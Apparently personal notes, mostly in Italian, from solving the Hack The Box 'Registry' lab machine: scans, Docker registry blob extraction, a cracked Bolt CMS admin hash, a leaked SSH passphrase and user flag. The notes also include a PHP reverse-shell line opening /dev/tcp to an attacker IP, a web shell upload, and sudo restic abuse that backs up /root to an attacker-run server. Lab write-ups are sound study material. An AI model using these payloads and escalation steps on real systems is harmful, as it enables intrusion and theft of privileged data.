· 6 years ago · Nov 07, 2019, 10:20 AM
1 nmap -A 10.10.10.159
2Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-04 10:09 CET
3Nmap scan report for 10.10.10.159
4Host is up (0.18s latency).
5Not shown: 997 closed ports
6PORT STATE SERVICE VERSION
722/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
8| ssh-hostkey:
9| 2048 72:d4:8d:da:ff:9b:94:2a:ee:55:0c:04:30:71:88:93 (RSA)
10| 256 c7:40:d0:0e:e4:97:4a:4f:f9:fb:b2:0b:33:99:48:6d (ECDSA)
11|_ 256 78:34:80:14:a1:3d:56:12:b4:0a:98:1f:e6:b4:e8:93 (ED25519)
1280/tcp open http nginx 1.14.0 (Ubuntu)
13|_http-server-header: nginx/1.14.0 (Ubuntu)
14|_http-title: Welcome to nginx!
15443/tcp open ssl/http nginx 1.14.0 (Ubuntu)
16|_http-server-header: nginx/1.14.0 (Ubuntu)
17|_http-title: Welcome to nginx!
18| ssl-cert: Subject: commonName=docker.registry.htb
19| Not valid before: 2019-05-06T21:14:35
20|_Not valid after: 2029-05-03T21:14:35
21No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
22
23
24echo 10.10.10.159 docker.registry.htb >> /etc/hosts
25echo 10.10.10.159 registry.htb >> /etc/hosts
26
27
28--------------------------------------------------------------------------
29
30
31GENERATED WORDS: 4612
32
33---- Scanning URL: http://docker.registry.htb/ ----
34+ http://docker.registry.htb/v2 (CODE:301|SIZE:39)
35
36
37dirb https://docker.registry.htb
38
39
40
41-----------------
42
43GENERATED WORDS: 4612
44
45---- Scanning URL: https://docker.registry.htb/ ----
46+ https://docker.registry.htb/v2 (CODE:301|SIZE:39)
47
48
49--------------------------------------------------------------------------
50
51
52https://docker.registry.htb/v2/ admin admin
53
54
55
56/install
57/install/index.php <-------------------- gzip con CA
58
59/backup.php
60
61
62
63
64
65
66SFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuMTQuMCAoVWJ1bnR1KQ0KRGF0ZTogTW9uLCAwNCBOb3YgMjAxOSAxMzozMDo1MSBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC9odG1sOyBjaGFyc2V0PVVURi04DQpDb25uZWN0aW9uOiBjbG9zZQ0KU3RyaWN0LVRyYW5zcG9ydC1TZWN1cml0eTogbWF4LWFnZT02MzA3MjAwMDsgaW5jbHVkZVN1YmRvbWFpbnMNClgtRnJhbWUtT3B0aW9uczogREVOWQ0KWC1Db250ZW50LVR5cGUtT3B0aW9uczogbm9zbmlmZg0KQ29udGVudC1MZW5ndGg6IDEwNTANCg0KH4sIAGyDP10AA+3VSa+rNhQA4LvmV0TqMnqXIQSS7mwwYYgJBDLuSJgJhIATCL++N/dVlfo6SVVfq0r+NpbOOcKWbM45B+/nhrx9V9wHWZ5+rpzI/3rlOIHnpDd+IkoiL0wkTn7jeEHgp28j7vse66t7S4JmNHrruu5LGJDgj+r+Kv8/9eUFooVhjxS09g3NUICPPqMMNgyFVRUFRF4COgOCxDCBoRGt1LZ+hwgG3ELxbgvPOE1UF0Gl2wAMcY984MDE3jIQYKxo5uUoXIZQN6cYinvVR1Osbjo7N3rsu4O9vX7EjM8YHn6JdWhAawaD2QLwGwS6ztiU2yrY29y5KrokQdm3uwN3A4BoQLUDr7wFrgZkgKt0c1jabQ3D+HkWMRmTaBODbRrVeR5xrIm48DQ3bmXBqx+RXdwA5V7y1+oRnAx2yvjT5rlPdqd54c0UKRnaixY7aSMTv6yV7BIsHWAOuq+m1lh3FXwFqTpY+6xAQujVrTllhqMVmKeSeFI8uS3z3Bywc3vikLCZWFRCU3NHJxxPZ7VRzNAwU2Y15MlKzidjF0Tz7sw00qPnncOjWx12cpTIPordsnQJe220Vr5K9yOPm+qErNNRGp9aZ79UiSihh15CNdxUPDMs/MGYHIQNrlfyeo9sTmoloov3uA76S10nq2otpN6j8/bN7rlNBXW74I/H+/iyJGKkG8xNMx9mMy3YPuTsMRw/BL1RVmkMEgwBWOSbAa4x5F43FaqJu4PQr61o7aHh4Rf33Z6ZsV01HyaqcwDufADx63HoHkYLFeySb4q/qf36kPSP74N4hqAPVODq7O+9vNfdAxfAZWLPe8618ThNTEN/+MieMEtwTUW1FPbT2yFijxVRrN24rmGzX5bFquSlIjd7qcPGY2OvrFsn6NNtq9d+Dr1jXCGT2ZR3R9+lD0Ub0sXRzC00BhW/Fa8gg5EboQKJxqyyzDa2TC7TVkN+XJ0gOQj9osCDZDOyuY1QPX+E5T2XWQcXZ6JKQtkXGHTVMjOjnJwCYTzvNQuvIjZo1yCP3WjptEsbh03DKJvez/YIKb3mLKrToIcnogf6TckaBOWOjI9pOukO2vZszyYnuZLzwXpORNUu3NDoyZxxsZPfeG/q3fbmbbjW4qoiabK7fPwtXsRKw+zo39U8tI2654gmy0GTCs1mZewtI2r6KWQ+uwKy1d92iv+6i1F/VxMFYRm9l+F33OMv5j8ncPxr/suCIHGixL3mvyTJdP7/G34YOU32CEg0Uq/nImpG6yjJWtI8GebLKCWkbn9k2fB6bt/Dz/z7+Vqyzc81bBjVl+szqxL2T6qjKsmqiG2j873JyJM9Rw3J4uz8sWnL0tZBURRFURRFURRFURRFURRFURRFURT1z/gJNZErZAAoAAAK
67
68
69ca.crt0000775000004100000410000000210613464123607012215 0ustar www-datawww-data
70
71-----BEGIN CERTIFICATE-----
72MIIC/DCCAeSgAwIBAgIJAIFtFmFVTwEtMA0GCSqGSIb3DQEBCwUAMBMxETAPBgNV
73BAMMCFJlZ2lzdHJ5MB4XDTE5MDUwNjIxMTQzNVoXDTI5MDUwMzIxMTQzNVowEzER
74MA8GA1UEAwwIUmVnaXN0cnkwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
75AQCw9BmNspBdfyc4Mt+teUfAVhepjje0/JE0db9Iqmk1DpjjWfrACum1onvabI/5
76T5ryXgWb9kS8C6gzslFfPhr7tTmpCilaLPAJzHTDhK+HQCMoAhDzKXikE2dSpsJ5
77zZKaJbmtS6f3qLjjJzMPqyMdt/i4kn2rp0ZPd+58pIk8Ez8C8pB1tO7j3+QAe9wc
78r6vx1PYvwOYW7eg7TEfQmmQt/orFs7o6uZ1MrnbEKbZ6+bsPXLDt46EvHmBDdUn1
79zGTzI3Y2UMpO7RXEN06s6tH4ufpaxlppgOnR2hSvwSXrWyVh2DVG1ZZu+lLt4eHI
80qFJvJr5k/xd0N+B+v2HrCOhfAgMBAAGjUzBRMB0GA1UdDgQWBBTpKeRSEzvTkuWX
818/wn9z3DPYAQ9zAfBgNVHSMEGDAWgBTpKeRSEzvTkuWX8/wn9z3DPYAQ9zAPBgNV
82HRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQABLgN9x0QNM+hgJIHvTEN3
83LAoh4Dm2X5qYe/ZntCKW+ppBrXLmkOm16kjJx6wMIvUNOKqw2H5VsHpTjBSZfnEJ
84UmuPHWhvCFzhGZJjKE+An1V4oAiBeQeEkE4I8nKJsfKJ0iFOzjZObBtY2xGkMz6N
857JVeEp9vdmuj7/PMkctD62mxkMAwnLiJejtba2+9xFKMOe/asRAjfQeLPsLNMdrr
86CUxTiXEECxFPGnbzHdbtHaHqCirEB7wt+Zhh3wYFVcN83b7n7jzKy34DNkQdIxt9
87QMPjq1S5SqXJqzop4OnthgWlwggSe/6z8ZTuDjdNIpx0tF77arh2rUOIXKIerx5B
88-----END CERTIFICATE-----
89
90readme.md0000775000004100000410000000020113472260460012667 0ustar www-datawww-data# Private Docker Registry
91
92- https://docs.docker.com/registry/deploying/
93- https://docs.docker.com/engine/security/certificates/
94
95
96
97/v2/image /manifest
98
99
100scaricare i docker e trovare utente bolt e certificato root
101
102password nei file sh del certificato.
103
104usare il certificato
105
106
107
108
109
110
111
112
113
114dirbuster http://docker.registry.htb
115
116The methodology for getting the catalog size is:
117
118 GET /v2/_catalog?n=300 (more than our repo count)
119 for each repository returned, GET /v2/[repository_path]/tags/list
120 for each tag listed, GET /v2/[repository_path]/manifests/[tag]
121 from the manifest returned, HEAD /v2/[repository_path]/blobs/[blob_checksum]
122 store the content-length header
123
124
125v2/_catalog
126{"repositories":["bolt-image"]}
127
128
129
130ytc0ytdmnzywnzgxngi0zte0otm3ywzi
131
132
133
134
135
136
137
138
139
140
141
142
143https://github.com/docker/distribution/issues/2212
144
145
146
147
148enumerazione docker ---> manifest----> puntamenti a file ocmpressi
149
150garbage registry docker. utente bolt registry.htb/bolt e github cms
151
152
153::::::::::::::::::::::::::::
154
155
156http://docker.registry.htb/v2/ admin admin
157
158http://docker.registry.htb/v2/_catalog?n=300
159{"repositories":["bolt-image"]}
160
161
162http://docker.registry.htb/v2/bolt-image/tags/list
163{"name":"bolt-image","tags":["latest"]}
164
165
166http://docker.registry.htb/v2/bolt-image/manifests/latest
167
168
169
170
171
172{
173 "schemaVersion": 1,
174 "name": "bolt-image",
175 "tag": "latest",
176 "architecture": "amd64",
177 "fsLayers": [
178 {
179 "blobSum": "sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b"
180 },
181 {
182 "blobSum": "sha256:3f12770883a63c833eab7652242d55a95aea6e2ecd09e21c29d7d7b354f3d4ee"
183 },
184 {
185 "blobSum": "sha256:02666a14e1b55276ecb9812747cb1a95b78056f1d202b087d71096ca0b58c98c"
186 },
187 {
188 "blobSum": "sha256:c71b0b975ab8204bb66f2b659fa3d568f2d164a620159fc9f9f185d958c352a7"
189 },
190 {
191 "blobSum": "sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791"
192 },
193 {
194 "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
195 },
196 {
197 "blobSum": "sha256:f5029279ec1223b70f2cbb2682ab360e1837a2ea59a8d7ff64b38e9eab5fb8c0"
198 },
199 {
200 "blobSum": "sha256:d9af21273955749bb8250c7a883fcce21647b54f5a685d237bc6b920a2ebad1a"
201 },
202 {
203 "blobSum": "sha256:8882c27f669ef315fc231f272965cd5ee8507c0f376855d6f9c012aae0224797"
204 },
205 {
206 "blobSum": "sha256:f476d66f540886e2bb4d9c8cc8c0f8915bca7d387e536957796ea6c2f8e7dfff"
207 }
208 ],
209 "history": [
210 {
211 "v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"e2e880122289\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"bash\"],\"Image\":\"docker.registry.htb/bolt-image\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"container\":\"e2e88012228993b25b697ee37a0aae0cb0ecef7b1536d2b8e488a6ec3f353f14\",\"container_config\":{\"Hostname\":\"e2e880122289\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"bash\"],\"Image\":\"docker.registry.htb/bolt-image\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"created\":\"2019-05-25T15:18:56.9530238Z\",\"docker_version\":\"18.09.2\",\"id\":\"f18c41121574af38e7d88d4f5d7ea9d064beaadd500d13d33e8c419d01aa5ed5\",\"os\":\"linux\",\"parent\":\"9380d9cebb5bc76f02081749a8e795faa5b5cb638bf5301a1854048ff6f8e67e\"}"
212 },
213 {
214 "v1Compatibility": "{\"id\":\"9380d9cebb5bc76f02081749a8e795faa5b5cb638bf5301a1854048ff6f8e67e\",\"parent\":\"d931b2ca04fc8c77c7cbdce00f9a79b1954e3509af20561bbb8896916ddd1c34\",\"created\":\"2019-05-25T15:13:31.3975799Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
215 },
216 {
217 "v1Compatibility": "{\"id\":\"d931b2ca04fc8c77c7cbdce00f9a79b1954e3509af20561bbb8896916ddd1c34\",\"parent\":\"489e49942f587534c658da9060cbfc0cdb999865368926fab28ccc7a7575283a\",\"created\":\"2019-05-25T14:57:27.6745842Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
218 },
219 {
220 "v1Compatibility": "{\"id\":\"489e49942f587534c658da9060cbfc0cdb999865368926fab28ccc7a7575283a\",\"parent\":\"7f0ab92fdf7dd172ef58247894413e86cfc60564919912343c9b2e91cd788ae4\",\"created\":\"2019-05-25T14:47:52.6859489Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
221 },
222 {
223 "v1Compatibility": "{\"id\":\"7f0ab92fdf7dd172ef58247894413e86cfc60564919912343c9b2e91cd788ae4\",\"parent\":\"5f7e711dba574b5edd0824a9628f3b91bfd20565a5630bbd70f358f0fc4ebe95\",\"created\":\"2019-05-24T22:51:14.8744838Z\",\"container_config\":{\"Cmd\":[\"/bin/bash\"]}}"
224 },
225 {
226 "v1Compatibility": "{\"id\":\"5f7e711dba574b5edd0824a9628f3b91bfd20565a5630bbd70f358f0fc4ebe95\",\"parent\":\"f75463b468b510b7850cd69053a002a6f10126be3764b570c5f80a7e5044974c\",\"created\":\"2019-04-26T22:21:05.100534088Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) CMD [\\\"/bin/bash\\\"]\"]},\"throwaway\":true}"
227 },
228 {
229 "v1Compatibility": "{\"id\":\"f75463b468b510b7850cd69053a002a6f10126be3764b570c5f80a7e5044974c\",\"parent\":\"4b937c36cc17955293cc01d8c7c050c525d22764fa781f39e51afbd17e3e5529\",\"created\":\"2019-04-26T22:21:04.936777709Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c mkdir -p /run/systemd \\u0026\\u0026 echo 'docker' \\u003e /run/systemd/container\"]}}"
230 },
231 {
232 "v1Compatibility": "{\"id\":\"4b937c36cc17955293cc01d8c7c050c525d22764fa781f39e51afbd17e3e5529\",\"parent\":\"ab4357bfcbef1a7eaa70cfaa618a0b4188cccafa53f18c1adeaa7d77f5e57939\",\"created\":\"2019-04-26T22:21:04.220422684Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c rm -rf /var/lib/apt/lists/*\"]}}"
233 },
234 {
235 "v1Compatibility": "{\"id\":\"ab4357bfcbef1a7eaa70cfaa618a0b4188cccafa53f18c1adeaa7d77f5e57939\",\"parent\":\"f4a833e38a779e09219325dfef9e5063c291a325cad7141bcdb4798ed68c675c\",\"created\":\"2019-04-26T22:21:03.471632173Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c set -xe \\t\\t\\u0026\\u0026 echo '#!/bin/sh' \\u003e /usr/sbin/policy-rc.d \\t\\u0026\\u0026 echo 'exit 101' \\u003e\\u003e /usr/sbin/policy-rc.d \\t\\u0026\\u0026 chmod +x /usr/sbin/policy-rc.d \\t\\t\\u0026\\u0026 dpkg-divert --local --rename --add /sbin/initctl \\t\\u0026\\u0026 cp -a /usr/sbin/policy-rc.d /sbin/initctl \\t\\u0026\\u0026 sed -i 's/^exit.*/exit 0/' /sbin/initctl \\t\\t\\u0026\\u0026 echo 'force-unsafe-io' \\u003e /etc/dpkg/dpkg.cfg.d/docker-apt-speedup \\t\\t\\u0026\\u0026 echo 'DPkg::Post-Invoke { \\\"rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true\\\"; };' \\u003e /etc/apt/apt.conf.d/docker-clean \\t\\u0026\\u0026 echo 'APT::Update::Post-Invoke { \\\"rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true\\\"; };' \\u003e\\u003e /etc/apt/apt.conf.d/docker-clean \\t\\u0026\\u0026 echo 'Dir::Cache::pkgcache \\\"\\\"; Dir::Cache::srcpkgcache \\\"\\\";' \\u003e\\u003e /etc/apt/apt.conf.d/docker-clean \\t\\t\\u0026\\u0026 echo 'Acquire::Languages \\\"none\\\";' \\u003e /etc/apt/apt.conf.d/docker-no-languages \\t\\t\\u0026\\u0026 echo 'Acquire::GzipIndexes \\\"true\\\"; Acquire::CompressionTypes::Order:: \\\"gz\\\";' \\u003e /etc/apt/apt.conf.d/docker-gzip-indexes \\t\\t\\u0026\\u0026 echo 'Apt::AutoRemove::SuggestsImportant \\\"false\\\";' \\u003e /etc/apt/apt.conf.d/docker-autoremove-suggests\"]}}"
236 },
237 {
238 "v1Compatibility": "{\"id\":\"f4a833e38a779e09219325dfef9e5063c291a325cad7141bcdb4798ed68c675c\",\"created\":\"2019-04-26T22:21:02.724843678Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:7ce84f13f11609a50ece7823578159412e2299c812746d1d1f1ed5db0728bd37 in / \"]}}"
239 }
240 ],
241 "signatures": [
242 {
243 "header": {
244 "jwk": {
245 "crv": "P-256",
246 "kid": "BE5C:NOJP:EOC2:ERND:F2LL:EUKC:5KAA:FAKD:4WV3:SF5Z:T3BE:KD5F",
247 "kty": "EC",
248 "x": "AzGEIs7i0H7UBjuBNzAK81A6-fmLG1Pt2WLvxUsTBGI",
249 "y": "rHfxYV5s6hLG5C6UYcSw6qW0Vd4ZvlI3JyGcBvFLJyI"
250 },
251 "alg": "ES256"
252 },
253 "signature": "Qm65jE1RNqpkHcj0_-MqJ8DnW11rZGR9jEbsDQFe4wWs4I8LuYEWyV6ktxpTy_0T-VQSMRLxSXpvxil0pi4H4Q",
254 "protected": "eyJmb3JtYXRMZW5ndGgiOjY3OTIsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAxOS0xMS0wNVQwODoyNDoyMVoifQ"
255 }
256 ]
257}
258
259
260
261
262registry.htb/backup.php esegue un php shell execute che esegue il backup <--------------
263
264
265
266http://docker.registry.htb/v2/bolt-image/blobs/sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b
267
268e così tutti gli altri fino a sha256:f476d66f540886e2bb4d9c8cc8c0f8915bca7d387e536957796ea6c2f8e7dfff
269
270
271decomprimiamo e cerchiamo informazioni dentro i container
272
273
274::::::::::::::
275INFO UTILI
276::::::::::::::
277
278
279bolt@bolt:/var/www/html$ netstat -an
280Active Internet connections (servers and established)
281Proto Recv-Q Send-Q Local Address Foreign Address State
282tcp 0 0 127.0.0.1:5000 0.0.0.0:* LISTEN
283tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
284tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
285tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
286tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN
287tcp 0 316 10.10.10.159:22 10.10.14.34:53700 ESTABLISHED
288tcp6 0 0 :::80 :::* LISTEN
289tcp6 0 0 :::22 :::* LISTEN
290udp 0 0 127.0.0.53:53 0.0.0.0:*
291
292
293
294
295/var/www/html/sync.sh da vi????? non suid
296/etc/profile.d/01-ssh.sh
297
298
299#!/usr/bin/expect -f
300#eval `ssh-agent -s`
301spawn ssh-add /root/.ssh/id_rsa
302expect "Enter passphrase for /root/.ssh/id_rsa:"
303send "GkOcz221Ftb3ugog\n"; <--------- chiave di un certificato????
304expect "Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)"
305interact
306
307
308git clone https://github.com/bolt/bolt.git <-----git hub????
309
310ssh-keygen -t rsa -b 4096 -C "bolt@registry.htb"
311
312
313
314
315www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
316backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
317list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
318irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
319gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
320nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
321_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
322
323c'è anche user bolt in altri garbage
324
325
326#!/bin/bash
327rsync -azP registry:/var/www/html/bolt . sync.sh in /var/www/html
328
329
330.vminfo di /root ha molte informazioni su comandi lanciati in vim. ma vim no suid
331
332
333Trovate le chiavi in /root/.ssh in pratica il root del container è lo user bolt
334
335Host registry
336 User bolt
337 Port 22
338 Hostname registry.htb
339
340passphrase GkOcz221Ftb3ugog
341
342
343System load: 0.0 Users logged in: 0
344 Usage of /: 5.5% of 61.80GB IP address for eth0: 10.10.10.159
345 Memory usage: 23% IP address for br-1bad9bd75d17: 172.18.0.1
346 Swap usage: 0% IP address for docker0: 172.17.0.1
347
348
349ok dentro.....Prendiamo user
350
351bolt@bolt:~$ cat user.txt
352ytc0ytdmnzywnzgxngi0zte0otm3ywzi
353bolt@bolt:~$
354
355
356
357bolt@bolt:/var/www/html$ cat backup.php
358<?php shell_exec("sudo restic backup -r rest:http://backup.registry.htb/bolt bolt");
359
360lo possiamo intendere come un sudo -l... ma come utente????non è ALL
361
362sudo restic backup -r rest:http://backup.registry.htb/bolt bolt
363
364
365
366
367https://github.com/restic/restic
368
369il backup fa il download in quanto usa api restfull. i file sotto la fold destinataria vengono scritti come www-data.
370aggiungere un file in
371http://backup.registry.htb/bolt da far scrivere in bolt????
372
373
374
375
376
377
378bolt@bolt:/var/www/html/bolt$ ls
379app codeception.yml composer.lock extensions index.php phpunit.xml.dist src theme
380changelog.md composer.json CONTRIBUTING.md files LICENSE.md README.md tests vendor
381
382sottosito in
383
384
385http://registry.htb/bolt/ <-------------
386
387
388find ./ -name *.db
389./vendor/codeception/codeception/tests/data/sqlite.db
390./tests/phpunit/unit/resources/db/bolt.db
391./app/database/bolt.db
392
393
394find ./ -name login*
395./vendor/codeception/codeception/tests/data/app/view/login.php
396./app/view/twig/login
397./app/view/twig/login/login.twig
398
399
400
401scp -i id_rsa bolt@registry.htb:/var/www/html/bolt/app/database/bolt.db ./database.db
402
403usiamo sqlitebrowser. dati importanti
404
405troviamo admin
406$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PK
407["files://shell.php"]
408
409
410Cost 1 (iteration count) is 1024 for all loaded hashes
411Press 'q' or Ctrl-C to abort, almost any other key for status
412
413strawberry (?) <-----------
414
4151g 0:00:00:12 DONE (2019-11-05 10:33) 0.08143g/s 26.62p/s 26.62c/s 26.62C/s strawberry..dennis
416Use the "--show" option to display all of the cracked passwords reliably
417Session completed
418
419
420
421per scrivere in bolt e aggiungere un file da eseguire al sito es. shell.php bisogna essere www-data l'unico che
422può scrivere in html/bolt
423
424movimento laterale. invece root esegue backup.php <------
425
426
427
428
429creare un file su web bolt ed eseguire backup come www-data che èuò leggere hystory ed eseguire sudo restic (shell root)
430
431
432
433
434
435
436cd bolt
437
438
439
440
441lxd:x:105:65534::/var/lib/lxd/:/bin/false
442uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
443dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
444landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
445pollinate:x:109:1::/var/cache/pollinate:/bin/false
446statd:x:110:65534::/var/lib/nfs:/usr/sbin/nologin
447sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
448bolt:x:1001:1001::/home/bolt:/bin/bash
449vboxadd:x:999:1::/var/run/vboxadd:/bin/false
450git:x:1000:33::/var/www/html:/bin/bash
451
452
453bolt ---> git ----->www-data (.bashhitory)????----> root
454
455
456
457abbiamo admin strawberry. creare pagina su /bolt e eseguire backup come www-data <-----------------
458
459
460
461http://backup.registry.htb/bolt/bolt/login <-----github
462
463accesso admin strawberry
464
465
466
467http://backup.registry.htb/bolt/bolt/files <----- come nel db stack
468
469files://
470
471themes://base-2018
472
473
474uploado un file sotto theme e richiamo il backup.php che mi salva come www-data <----------------------
475
476
477
478
479
480
481autorizzo il file con estesione php [NON SI RIESCE A SALVARE IL FILE YAML]
482
483http://backup.registry.htb/bolt/bolt/file/edit/config/config.yml
484
485# never allowed: sh, asp, cgi, php, php3, ph3, php4, ph4, php5, ph5, phtm, phtml
486accept_file_types: [ php, twig, html, js, css, scss, gif, jpg, jpeg, png, ico, zip, tgz, txt, md, doc, docx, pdf, epub, xls, xlsx, ppt, pptx, mp3, ogg, wav, m4a, mp4, m4v, ogv, wmv, avi, webm, svg]
487
488
489
490e se invece la carte
491
492
493
494
495
496
497ls -lisa /var/backups
498total 111292
4992883586 4 drwxr-xr-x 2 root root 4096 May 29 11:05 .
5002883585 4 drwxr-xr-x 14 root root 4096 May 19 22:19 ..
5012886019 111284 -rw-r--r-- 1 root root 113953155 May 29 11:04 bolt.tgz <----?????
502
503
504
505
506
5072891781 0 -rw------- 1 git www-data 0 Oct 8 21:54 .bash_history
508
509
510
511
512olt@bolt:/var/www/html/install$ ls
513index.php
514bolt@bolt:/var/www/html/install$ cat index.php <---dati binari ca.crt
515
516
517
518---------------------------------------
519
520
521exiftool -Comment='<?php echo system('/bin/sh -i >& /dev/tcp/10.10.14.34/8000 0>&1'); ?>' ./Desktop/1.png
522
523
524CMS Bolt - Arbitrary File Upload (Metasploit) | exploits/php/remote/38196.rb
525
526sito reale http://registry.htb/bolt/bolt/login
527
528
529
530modificare il file config.yml da registry.htb e immediatamanete prima di un backup caricare il file php che ci funziona come
531www-data.
532
533sudo -l www-data esegue il backup. quando parte il backup il sito viene sovrascritto
534
535
536http://registry.htb/bolt/bolt/file/edit/config/config.yml
537http://registry.htb/bolt/bolt/files
538http://registry.htb/bolt/files/mytest.php?a846763cc3
539
540
541
542
543
544Matching Defaults entries for www-data on bolt:
545env_reset, exempt_group=sudo, mail_badpass,
546secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
547User www-data may run the following commands on bolt: (root) NOPASSWD: /usr/bin/restic backup -r rest*
548
549
550<?php shell_exec("sudo restic backup -r rest:http://backup.registry.htb/bolt bolt");
551
552
553di default senza echo php non abbiamo stdout. eseguire shell php con >
554
555
556
557
558
559<?php
560echo "Avvio shell...<br>";
561echo system("sudo restic backup -r rest --help");
562
563
564Avvio shell...
565The "backup" command creates a new snapshot and saves the files and directories given as the arguments. Usage: restic backup [flags] FILE/DIR [FILE/DIR] ... Flags: -e, --exclude pattern exclude a pattern (can be specified multiple times) --exclude-caches excludes cache directories that are marked with a CACHEDIR.TAG file --exclude-file file read exclude patterns from a file (can be specified multiple times) --exclude-if-present stringArray takes filename[:header], exclude contents of directories containing filename (except filename itself) if header of that file is as provided (can be specified multiple times) --files-from string read the files to backup from file (can be combined with file args) -f, --force force re-reading the target files/directories (overrides the "parent" flag) -h, --help help for backup --hostname hostname set the hostname for the snapshot manually. To prevent an expensive rescan use the "parent" flag -x, --one-file-system exclude other file systems --parent string use this parent snapshot (default: last snapshot in the repo that has the same target files/directories) --stdin read backup from stdin --stdin-filename string file name to use when reading from stdin (default "stdin") --tag tag add a tag for the new snapshot (can be specified multiple times) --time string time of the backup (ex. '2012-11-01 22:08:41') (default: now) --with-atime store the atime for all files and directories Global Flags: --cacert stringSlice path to load root certificates from (default: use system certificates) --cache-dir string set the cache directory --cleanup-cache auto remove old cache directories --json set output mode to JSON for commands that support it --limit-download int limits downloads to a maximum rate in KiB/s. (default: unlimited) --limit-upload int limits uploads to a maximum rate in KiB/s. (default: unlimited) --no-cache do not use a local cache --no-lock do not lock the repo, this allows some operations on read-only repos -o, --option key=value set extended option (key=value, can be specified multiple times) -p, --password-file string read the repository password from a file (default: $RESTIC_PASSWORD_FILE) -q, --quiet do not output comprehensive progress report -r, --repo string repository to backup to or restore from (default: $RESTIC_REPOSITORY) --tls-client-cert string path to a file containing PEM encoded TLS client certificate and private key --tls-client-cert string path to a file containing PEM encoded TLS client certificate and private key
566
567:::::::::::::::::::::::::::::::::::::::::::::::::::::::
568
569preparare sotto /temp con bolt un rest server
570https://github.com/restic/rest-server/blob/master/cmd/rest-server/main.go ?????
571in questo modo dovrebbe essere soddisfatta anche la regola del backup.registry.htb
572
573
574oppure
575
576https://computingforgeeks.com/best-secure-backup-program/
577
578
579$ sudo restic autocomplete
580
581Usage:
582 restic autocomplete [flags]
583
584Flags:
585 --completionfile string autocompletion file (default "/etc/bash_completion.d/restic.sh")
586
587
588
589
590apri TUNNEL remoto to local 8000 e scriviamo il file pwd per restic
591
592ssh -R 6969:127.0.0.1:8000 -i /root/Desktop/id_rsa bolt@registry.htb
593echo tecnica > /tmp/pwd.txt
594
595
596installazione di rest-server
597git clone https://github.com/restic/rest-server.git
598
599From source
600Build
601
602make
603
604
605
606If all goes well, you'll find the binary in the current directory.
607
608Alternatively, you can compile and install it in your $GOBIN with a standard go install ./cmd/rest-server. But, beware, you won't have version info built into binary when compiled that way!
609Install
610
611make install
612
613Installs the binary as /usr/local/bin/rest-server.
614
615Alternatively, you can install it manually anywhere you want. It's a single binary, there are no dependencies.
616
617##################à
618
619installa go per la compilazione del make
620apt-get install go
621
622
623fai partire il server restic
624rest-server --path /root/Desktop/restic/bolt/ --no-auth
625
626carichiamo il php in bolt
627echo system("sudo restic backup -r rest:http://127.0.0.1:6969 -p /tmp/pwd.txt /root");
628
629lanciamo il php e otteniamo il nome della snapshot creata
